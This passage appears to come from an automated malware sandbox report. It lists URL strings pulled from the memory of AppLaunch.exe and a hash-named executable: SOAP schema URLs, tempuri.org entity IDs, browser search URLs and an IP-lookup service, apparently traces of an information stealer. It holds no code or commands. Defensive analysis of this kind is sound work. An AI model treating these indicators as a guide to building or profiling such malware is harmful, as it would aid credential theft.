                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, conhost.exe, 0000000B.00000002.747239669.000001B080001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://service.r
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://support.a
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://support.apple.com/kb/HT203092
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabt
                  Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
